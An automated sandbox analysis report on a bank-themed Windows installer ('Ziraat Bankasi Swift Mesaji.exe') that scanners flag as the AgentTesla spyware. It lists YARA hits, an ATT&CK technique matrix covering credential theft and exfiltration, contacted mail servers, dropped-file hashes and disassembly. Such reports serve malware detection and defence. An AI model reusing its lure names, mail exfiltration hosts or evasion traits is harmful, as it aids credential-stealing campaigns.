                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.415058.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.30a1458.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3090000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4930000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4930000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.37f3258.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.30a1458.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.5446f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3090000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.5446f0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.415058.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Ziraat Bankasi Swift Mesaji.exe.415058.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.551571985.0000000000508000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.291447047.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.294724890.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 7108, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionAccess Token Manipulation1Disable or Modify Tools11OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                      Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSystem Information Discovery126Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion131LSA SecretsQuery Registry1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemVirtualization/Sandbox Evasion131Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Ziraat Bankasi Swift Mesaji.exe23%ReversingLabsWin32.Trojan.AgentTesla
                      Ziraat Bankasi Swift Mesaji.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      3.1.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Ziraat Bankasi Swift Mesaji.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.antimikrop.com.tr0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ipify.org%(0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://lRguGt.com0%Avira URL Cloudsafe
                      https://Wm2Dt2zcSt3c655v3va.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.yandex.ru
                      77.88.21.37
                      truefalse
                        high
                        mail.antimikrop.com.tr
                        unknown
                        unknowntrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.org%(Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://127.0.0.1:HTTP/1.1Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://api.ipify.org%GETMozilla/5.0Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        low
                        http://DynDns.comDynDNSZiraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://lRguGt.comZiraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nsis.sf.net/NSIS_ErrorZiraat Bankasi Swift Mesaji.exefalse
                          high
                          http://nsis.sf.net/NSIS_ErrorErrorZiraat Bankasi Swift Mesaji.exefalse
                            high
                            https://Wm2Dt2zcSt3c655v3va.comZiraat Bankasi Swift Mesaji.exe, 00000003.00000002.553520842.00000000029D0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haZiraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipZiraat Bankasi Swift Mesaji.exe, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            77.88.21.37
                            mail.yandex.ruRussian Federation
                            13238YANDEXRUfalse

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:553163
                            Start date:14.01.2022
                            Start time:12:12:27
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Ziraat Bankasi Swift Mesaji.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:19
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/4@9/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 38.3% (good quality ratio 35.7%)
                            • Quality average: 78.6%
                            • Quality standard deviation: 30.1%
                            HCA Information:
                            • Successful, ratio: 87%
                            • Number of executed functions: 117
                            • Number of non-executed functions: 46
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            12:13:56API Interceptor430x Sleep call for process: Ziraat Bankasi Swift Mesaji.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            77.88.21.37Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                              Halkbank_Ekstre_20210825_073604_628391.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                mail.yandex.ruZiraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                • 77.88.21.37
                                Halkbank_Ekstre_20210825_073604_628391.exeGet hashmaliciousBrowse
                                • 77.88.21.37
                                http://www.depo-magazine.ru/news/2019/07/31/news_1838.htmlGet hashmaliciousBrowse
                                • 213.180.193.125

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                YANDEXRU3NeufRwoxF.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                O53TFikPkp.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                1Nb1LqIIq2Get hashmaliciousBrowse
                                • 95.108.137.46
                                V5Al4cc8RL.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                RFQ7534567.docGet hashmaliciousBrowse
                                • 77.88.21.158
                                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                • 77.88.21.37
                                Halkbank_Ekstre_20210825_073604_628391.exeGet hashmaliciousBrowse
                                • 77.88.21.37
                                MT106_11-Advance.Payment.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                DHL Delivery Invoice AWB 2774038374.pdf.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                DHL Delivery Invoice AWB 2774038374.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                4nmeEJrZJ9.exeGet hashmaliciousBrowse
                                • 5.255.255.5
                                Enquiries #oPU46rkEAKUhyA4.pdf.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                PUCHASE INQUIRIES.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                default.htmlGet hashmaliciousBrowse
                                • 77.88.21.119
                                JG4wxLFjVx.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                VCoycS3b62.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                zVd17VxIfi.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                DHL Delivery Invoice AWB 2774038374.exeGet hashmaliciousBrowse
                                • 77.88.21.158
                                8456754.docGet hashmaliciousBrowse
                                • 77.88.21.158
                                DmpOiwahZV.exeGet hashmaliciousBrowse
                                • 77.88.55.50

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\078s89jqsxc08eyh
                                Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):291839
                                Entropy (8bit):7.963840034244116
                                Encrypted:false
                                SSDEEP:6144:jpk7RyrNkcMOsZA7e0QzUwAwDHQ9tdTp3+4rALig5qDCiIt4hrBp4wyPcdG:jW7RyrS5BBzQxp+335qDXHrBp4BPcA
                                MD5:EA24D857020EB4FB65D427260C084C97
                                SHA1:CB446E36E6BDF214A3DFFB410F2F31E2EDE119E6
                                SHA-256:66F56E1C142E94CAB30C05F6E510304593544E760A9C0B1CA09D86F5D6390419
                                SHA-512:422C02D523C16E343865BC163E1C44F0AC4AB158BE647CE71FEA303B84C270A718AF4330D4AC51B88F061DD8CDBF25D9FEFFD13220E796A4992B173C3E4C8E01
                                Malicious:false
                                Reputation:low
                                Preview: (..{h..*[N...B.5X......j.....S. s..$E....W.Q..._.qV....~..z.{F...:=C...I.....K.pO.....(:`..H.g.}..{....|P..L.b.j$'B.xao..A.+m..~p&D..2..E........0.....wy!..LC.. .......gd.H.6.l8......CjG........e:).._..u).,C.wr......vb.....LY.J..X.y.!...@4.W.iC.+L.X{...*.K....O51+=V....i......J.cu s(.$EM...W.Q.t._..V....~C,.........^...........]T.4.gq..B1.8.I...q..w..@%.R.mYP.B.x.o..5.h"#......X.?.`...C.1........M...e<($.M.2Z1.....{..1.a|3....~S>....Y\w......\f.%T.......N.|.....ph....R..w..<.R4.W.iC.+...M...*.....e.5.H.....i.....S. ..l.U...B.Q..._..V..{.~C.z......0..D........]v+.]T_..gq..Bh.8n.&..q..w..@%...lP.2E.u...4.h"#..m.$XlB..`....:1....H......e<(.rG.2....nZ....1.a|3....~S>.^..Z\w......<.f.%T.......N.|...$..ph....R..w..<.R4.W.iC.+L.X{...*.N...o.5.......i.....S. s..$E....W.Q..._.qV....~C,z......0..D.......r....]T.t.gqC..B1.8nI...q..w..@%..mlP.B.xao..5.h"#...m]$Xl?.`....:1........M...e<($.M.2Z1........1.a|3....~S>....Y\w......<.f.%T.......N.|...$..
                                C:\Users\user\AppData\Local\Temp\fdazqvak
                                Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5177
                                Entropy (8bit):6.122705645881862
                                Encrypted:false
                                SSDEEP:96:i+LPt1QjqbEf4hXCNtd6C04Dg3yDck9uBTdQXTCXt+IGNMTUdUMfyOw:tLbQjqbcw+qQ0WuQW9aSct5w
                                MD5:80D6D3B339EF43FCB75B2B520A128560
                                SHA1:1C5FC2DE82F3E04606EC99E9657CD4FE268D4879
                                SHA-256:E40995D5D9195DDC3FE5D3AA67ED4212D41C21B8C7420D7F91EB8CD3386FA792
                                SHA-512:A7F3FBA52BED2BDB39034C970CDCC4AB90C64148597D1E51EB6AF697EF3D4EC863E8C5FB8D0DA1471ECAEE5101B8F262EF659ED7536918EF48D0E6058F6AB2B8
                                Malicious:false
                                Reputation:low
                                Preview: B1 ....=.=........Y....9.Y....A....`...................A......1..-.........AA.....)..%.........A$.....a..].........AO.....Y..U.......!..Y....r..9..5...A..b..A..=..A.....Z.+......A.....[.........5...A........\.....1...)...a...Y...9...A...............?.....1...!........A....`...........\............6.[....=...Y.......!.........!......Z.....Z......!....!.........6.[.....W.A....A....[.....8.A....A....[!....l.A....A....[!...=.=..Y....A`........1...........W..............<5A.....Y...!r.!..b....1...-..Ar.!.Z:....1...-...!..Y....1....8.A*....A_......<..A...!A.................< `..........6.[....=.=..Y....A`........Y...........W..............<5A.....Y......!r.!..b....Y...U...r.!.Z:....Y...U...r.!.*:...Y...U....b.!..+....Y...U..Ar.!.Z:....Y...U...!..Y....Y....W.A7....A4...........!..A....<...............!A.................< `..........6.[....=.=.`........5...........W..............<5A.....Y...!r.!..b....5...A...r.!.Z:....5...A...!..Y....5....l.A.....A.......<...
                                C:\Users\user\AppData\Local\Temp\nsyAE25.tmp
                                Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):321764
                                Entropy (8bit):7.815561849982555
                                Encrypted:false
                                SSDEEP:6144:NHpk7RyrNkcMOsZA7e0QzUwAwDHQ9tdTp3+4rALig5qDCiIt4hrBp4wyPcd1:BW7RyrS5BBzQxp+335qDXHrBp4BPc
                                MD5:B533A0B04B17F00B9F73B661D48D04D2
                                SHA1:BF3D337FEB9029E4FB11D96229330CE4F2CEC87F
                                SHA-256:89D35CC1F3C79201E3E5A8E617D2DDB8597AF3CB56018164014746E4CFED320D
                                SHA-512:2190182461931FA9A4739BDF96010C1A12C3F5C9E3F01993D20B30690D8608301271242A667C454AA20E5D68D3C626D3612B040D666459137BCBC5AF8068500C
                                Malicious:false
                                Reputation:low
                                Preview: .P......,........................<.......O.......P..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll
                                Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):4096
                                Entropy (8bit):3.7725519810575148
                                Encrypted:false
                                SSDEEP:24:e1GSb0JDlNmEcQqV3ax/+sK4RHJiDTyaNt01a5DTyxk8q6I1nPnRuV4MPgicisCm:SgZzhWipKxt9r6IPRuqSjsvyO
                                MD5:6D4D09737E9AB179CAB4481188F7C904
                                SHA1:F49AD85CA74D5D83F7E26E09C2B251F9FF5750EF
                                SHA-256:F8F3827A1D513BE5607BADD8AB724D264360B65321DF7338425E44BB8185A274
                                SHA-512:CBD50F889DF5AEB03A539F3965D965AA009F3EBA41CCDA15831AC0516820BFDF7F313A8DE1758DC42BC5F6396644D8A40AAC023F922C374E1A3D462B83100497
                                Malicious:false
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U.CU.CU.C...CT.C0..BZ.CU.Cw.C..BT.C..BT.C.QCT.C..BT.CRichU.C........PE..L..."2.a...........!......................... ...............................P............@.......................... ..L.... .......0.......................@..L.................................................... ...............................text...v........................... ..`.rdata..j.... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.936184384803921
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Ziraat Bankasi Swift Mesaji.exe
                                File size:270191
                                MD5:161523651320083122d05dd374c87ec4
                                SHA1:df8fae3ff1125841de5aa2306de3501e8204919a
                                SHA256:f4d91c834da24d653fef9049355102bcb68be411280268af61ac8f59bce581db
                                SHA512:0280e226de497d257b1a11f15e9dfd765ab0491b05199711dc71728c6a4fe9faff0a987a71ab97d37aa1af9cd4144e9611912add9d3abb507ec7efcee019ec76
                                SSDEEP:6144:owt4pSsfMNAKw5CFFe3NJMn9aiMcRmrEktnwVroIDx:Ze+wkCG9aptPBwVcS
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                                File Icon

                                Icon Hash:b2a88c96b2ca6a72

                                Static PE Info

                                General

                                Entrypoint:0x403225
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:099c0646ea7282d232219f8807883be0

                                Entrypoint Preview

                                Instruction
                                sub esp, 00000180h
                                push ebx
                                push ebp
                                push esi
                                xor ebx, ebx
                                push edi
                                mov dword ptr [esp+18h], ebx
                                mov dword ptr [esp+10h], 00409128h
                                xor esi, esi
                                mov byte ptr [esp+14h], 00000020h
                                call dword ptr [00407030h]
                                push 00008001h
                                call dword ptr [004070B4h]
                                push ebx
                                call dword ptr [0040727Ch]
                                push 00000008h
                                mov dword ptr [00423F58h], eax
                                call 00007EFEC0CC80D0h
                                mov dword ptr [00423EA4h], eax
                                push ebx
                                lea eax, dword ptr [esp+34h]
                                push 00000160h
                                push eax
                                push ebx
                                push 0041F450h
                                call dword ptr [00407158h]
                                push 004091B0h
                                push 004236A0h
                                call 00007EFEC0CC7D87h
                                call dword ptr [004070B0h]
                                mov edi, 00429000h
                                push eax
                                push edi
                                call 00007EFEC0CC7D75h
                                push ebx
                                call dword ptr [0040710Ch]
                                cmp byte ptr [00429000h], 00000022h
                                mov dword ptr [00423EA0h], eax
                                mov eax, edi
                                jne 00007EFEC0CC559Ch
                                mov byte ptr [esp+14h], 00000022h
                                mov eax, 00429001h
                                push dword ptr [esp+14h]
                                push eax
                                call 00007EFEC0CC7868h
                                push eax
                                call dword ptr [0040721Ch]
                                mov dword ptr [esp+1Ch], eax
                                jmp 00007EFEC0CC55F5h
                                cmp cl, 00000020h
                                jne 00007EFEC0CC5598h
                                inc eax
                                cmp byte ptr [eax], 00000020h
                                je 00007EFEC0CC558Ch
                                cmp byte ptr [eax], 00000022h
                                mov byte ptr [eax+eax+00h], 00000000h

                                Rich Headers

                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
